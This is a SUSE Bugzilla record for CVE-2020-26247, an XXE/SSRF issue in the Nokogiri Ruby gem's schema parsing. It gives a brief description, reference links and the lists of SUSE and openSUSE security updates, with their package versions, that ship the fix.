Bugzilla – Bug 1180507
VUL-0: CVE-2020-26247: rubygem-nokogiri: potentially XXE or SSRF attacks by parsed Nokogiri::XML::Schema
Last modified: 2022-10-27 11:41:50 UTC
CVE-2020-26247 Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri before version 1.11.0.rc4 there is an XXE vulnerability. XML Schemas parsed by Nokogiri::XML::Schema are trusted by default, allowing external resources to be accessed over the network, potentially enabling XXE or SSRF attacks. This behavior is counter to the security policy followed by Nokogiri maintainers, which is to treat all input as untrusted by default whenever possible. This is fixed in Nokogiri version 1.11.0.rc4. References: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26247 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26247 https://github.com/sparklemotion/nokogiri/commit/9c87439d9afa14a365ff13e73adc809cb2c3d97b https://github.com/sparklemotion/nokogiri/releases/tag/v1.11.0.rc4 https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vr8q-g5c7-m54m https://hackerone.com/reports/747489 https://rubygems.org/gems/nokogiri
SUSE-SU-2021:0210-1: An update that fixes two vulnerabilities is now available. Category: security (important) Bug References: 1146578,1180507 CVE References: CVE-2019-5477,CVE-2020-26247 JIRA References: Sources used: SUSE OpenStack Cloud Crowbar 9 (src): rubygem-nokogiri-1.6.1-5.3.1 SUSE OpenStack Cloud Crowbar 8 (src): rubygem-nokogiri-1.6.1-5.3.1 SUSE OpenStack Cloud 7 (src): rubygem-nokogiri-1.6.1-5.3.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2021:0251-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1146578,1156722,1180507 CVE References: CVE-2019-5477,CVE-2020-26247 JIRA References: Sources used: SUSE Linux Enterprise High Availability 15-SP2 (src): rubygem-nokogiri-1.8.5-3.6.1 SUSE Linux Enterprise High Availability 15-SP1 (src): rubygem-nokogiri-1.8.5-3.6.1 SUSE Linux Enterprise High Availability 15 (src): rubygem-nokogiri-1.8.5-3.6.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
openSUSE-SU-2021:0237-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1146578,1156722,1180507 CVE References: CVE-2019-5477,CVE-2020-26247 JIRA References: Sources used: openSUSE Leap 15.2 (src): rubygem-nokogiri-1.8.5-lp152.4.3.1
SUSE-RU-2021:0497-1: An update that solves one vulnerability, contains one feature and has 7 fixes is now available. Category: recommended (important) Bug References: 1048688,1149535,1179189,1179955,1180507,1181040,1181379,1181521 CVE References: CVE-2021-3281 JIRA References: SOC-11429 Sources used: SUSE OpenStack Cloud Crowbar 9 (src): crowbar-core-6.0+git.1611320924.849e748ff-3.34.1, crowbar-openstack-6.0+git.1610402342.21499240d-3.31.1, kibana-4.6.3-4.6.1, openstack-dashboard-14.1.1~dev10-3.21.3, openstack-manila-7.4.2~dev60-4.33.2, openstack-neutron-13.0.8~dev147-3.34.2, openstack-neutron-gbp-12.0.1~dev16-3.22.2, openstack-nova-18.3.1~dev78-3.34.2, python-Django1-1.11.29-3.18.2, release-notes-suse-openstack-cloud-9.20201214-3.27.2, sleshammer-0.9.0-7.6.1 SUSE OpenStack Cloud 9 (src): ardana-db-9.0+git.1611600773.5f1de5f-3.22.1, ardana-horizon-9.0+git.1610491814.38661c2-3.16.1, ardana-logging-9.0+git.1610490922.d5f9813-3.16.1, ardana-monasca-9.0+git.1610547641.d79ecfd-3.22.1, ardana-opsconsole-ui-9.0+git.1611867924.eb82818-4.16.1, ardana-osconfig-9.0+git.1610634027.5934cf8-3.25.1, kibana-4.6.3-4.6.1, openstack-dashboard-14.1.1~dev10-3.21.3, openstack-manila-7.4.2~dev60-4.33.2, openstack-neutron-13.0.8~dev147-3.34.2, openstack-neutron-gbp-12.0.1~dev16-3.22.2, openstack-nova-18.3.1~dev78-3.34.2, python-Django1-1.11.29-3.18.2, release-notes-suse-openstack-cloud-9.20201214-3.27.2, venv-openstack-horizon-14.1.1~dev10-4.25.2, venv-openstack-manila-7.4.2~dev60-3.27.2, venv-openstack-neutron-13.0.8~dev147-6.25.2, venv-openstack-nova-18.3.1~dev78-3.25.2 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2021:2554-1: An update that solves 16 vulnerabilities, contains 10 features and has 8 fixes is now available. Category: security (moderate) Bug References: 1019074,1044849,1057496,1073879,1113302,1123064,1143893,1166139,1176784,1179805,1180507,1181277,1181278,1181689,1181828,1182433,1183174,1183803,1184148,1185623,1185836,1186608,1186611,940812 CVE References: CVE-2017-11481,CVE-2017-11499,CVE-2017-5929,CVE-2019-25025,CVE-2020-17516,CVE-2020-26247,CVE-2020-29651,CVE-2021-21238,CVE-2021-21239,CVE-2021-21419,CVE-2021-23336,CVE-2021-27358,CVE-2021-28658,CVE-2021-31542,CVE-2021-33203,CVE-2021-33571 JIRA References: ECO-3105,PM-2352,SCRD-8523,SOC-11422,SOC-11470,SOC-11471,SOC-11521,SOC-11523,SOC-11525,SOC-9876 Sources used: SUSE OpenStack Cloud Crowbar 8 (src): cassandra-3.11.10-5.3.5, crowbar-core-5.0+git.1622489449.a8e60e238-3.50.4, crowbar-openstack-5.0+git.1616001417.67fd9c2a1-4.52.5, documentation-suse-openstack-cloud-deployment-8.20210512-1.32.5, documentation-suse-openstack-cloud-supplement-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-admin-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-user-8.20210512-1.32.5, grafana-6.7.4-4.18.2, kibana-4.6.6-3.9.2, openstack-heat-templates-0.0.0+git.1623056900.7917e18-3.21.3, openstack-monasca-installer-20190923_16.32-3.18.2, openstack-nova-16.1.9~dev92-3.48.5, openstack-nova-doc-16.1.9~dev92-3.48.5, python-Django-1.11.29-3.25.3, python-elementpath-1.3.1-1.3.2, python-eventlet-0.20.0-6.3.3, python-py-1.4.34-3.3.3, python-pysaml2-4.0.2-5.9.2, python-xmlschema-1.0.18-1.3.3, rubygem-activerecord-session_store-0.1.2-3.3.2 SUSE OpenStack Cloud 8 (src): ardana-cobbler-8.0+git.1614096566.e8c2b27-3.44.3, cassandra-3.11.10-5.3.5, documentation-suse-openstack-cloud-installation-8.20210512-1.32.5, documentation-suse-openstack-cloud-operations-8.20210512-1.32.5, documentation-suse-openstack-cloud-opsconsole-8.20210512-1.32.5, documentation-suse-openstack-cloud-planning-8.20210512-1.32.5, documentation-suse-openstack-cloud-security-8.20210512-1.32.5, documentation-suse-openstack-cloud-supplement-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-admin-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-user-8.20210512-1.32.5, documentation-suse-openstack-cloud-user-8.20210512-1.32.5, grafana-6.7.4-4.18.2, kibana-4.6.6-3.9.2, openstack-heat-templates-0.0.0+git.1623056900.7917e18-3.21.3, openstack-monasca-installer-20190923_16.32-3.18.2, openstack-nova-16.1.9~dev92-3.48.5, openstack-nova-doc-16.1.9~dev92-3.48.5, python-Django-1.11.29-3.25.3, python-elementpath-1.3.1-1.3.2, python-eventlet-0.20.0-6.3.3, python-py-1.4.34-3.3.3, python-pysaml2-4.0.2-5.9.2, python-xmlschema-1.0.18-1.3.3, venv-openstack-aodh-5.1.1~dev7-12.32.3, venv-openstack-barbican-5.0.2~dev3-12.33.3, venv-openstack-ceilometer-9.0.8~dev7-12.30.3, venv-openstack-cinder-11.2.3~dev29-14.34.2, venv-openstack-designate-5.0.3~dev7-12.31.3, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.28.3, venv-openstack-glance-15.0.3~dev3-12.31.3, venv-openstack-heat-9.0.8~dev22-12.33.2, venv-openstack-horizon-12.0.5~dev6-14.36.6, venv-openstack-ironic-9.1.8~dev8-12.33.3, venv-openstack-keystone-12.0.4~dev11-11.35.3, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.32.2, venv-openstack-manila-5.1.1~dev5-12.37.3, venv-openstack-monasca-2.2.2~dev1-11.28.3, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.28.3, venv-openstack-murano-4.0.2~dev2-12.28.3, venv-openstack-neutron-11.0.9~dev69-13.38.3, venv-openstack-nova-16.1.9~dev92-11.36.3, venv-openstack-octavia-1.0.6~dev3-12.33.3, venv-openstack-sahara-7.0.5~dev4-11.32.3, venv-openstack-swift-2.15.2_2.15.2_2.15.2~dev32-11.23.3, venv-openstack-trove-8.0.2~dev2-11.32.3 HPE Helion Openstack 8 (src): ardana-cobbler-8.0+git.1614096566.e8c2b27-3.44.3, cassandra-3.11.10-5.3.5, documentation-hpe-helion-openstack-installation-8.20210512-1.32.5, documentation-hpe-helion-openstack-operations-8.20210512-1.32.5, documentation-hpe-helion-openstack-opsconsole-8.20210512-1.32.5, documentation-hpe-helion-openstack-planning-8.20210512-1.32.5, documentation-hpe-helion-openstack-security-8.20210512-1.32.5, documentation-hpe-helion-openstack-user-8.20210512-1.32.5, grafana-6.7.4-4.18.2, kibana-4.6.6-3.9.2, openstack-heat-templates-0.0.0+git.1623056900.7917e18-3.21.3, openstack-monasca-installer-20190923_16.32-3.18.2, openstack-nova-16.1.9~dev92-3.48.5, openstack-nova-doc-16.1.9~dev92-3.48.5, python-Django-1.11.29-3.25.3, python-elementpath-1.3.1-1.3.2, python-eventlet-0.20.0-6.3.3, python-py-1.4.34-3.3.3, python-pysaml2-4.0.2-5.9.2, python-xmlschema-1.0.18-1.3.3, venv-openstack-aodh-5.1.1~dev7-12.32.3, venv-openstack-barbican-5.0.2~dev3-12.33.3, venv-openstack-ceilometer-9.0.8~dev7-12.30.3, venv-openstack-cinder-11.2.3~dev29-14.34.2, venv-openstack-designate-5.0.3~dev7-12.31.3, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.28.3, venv-openstack-glance-15.0.3~dev3-12.31.3, venv-openstack-heat-9.0.8~dev22-12.33.2, venv-openstack-horizon-hpe-12.0.5~dev6-14.36.3, venv-openstack-ironic-9.1.8~dev8-12.33.3, venv-openstack-keystone-12.0.4~dev11-11.35.3, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.32.2, venv-openstack-manila-5.1.1~dev5-12.37.3, venv-openstack-monasca-2.2.2~dev1-11.28.3, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.28.3, venv-openstack-murano-4.0.2~dev2-12.28.3, venv-openstack-neutron-11.0.9~dev69-13.38.3, venv-openstack-nova-16.1.9~dev92-11.36.3, venv-openstack-octavia-1.0.6~dev3-12.33.3, venv-openstack-sahara-7.0.5~dev4-11.32.3, venv-openstack-swift-2.15.2_2.15.2_2.15.2~dev32-11.23.3, venv-openstack-trove-8.0.2~dev2-11.32.3 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
fixed in 002-CVE-2020-26247.patch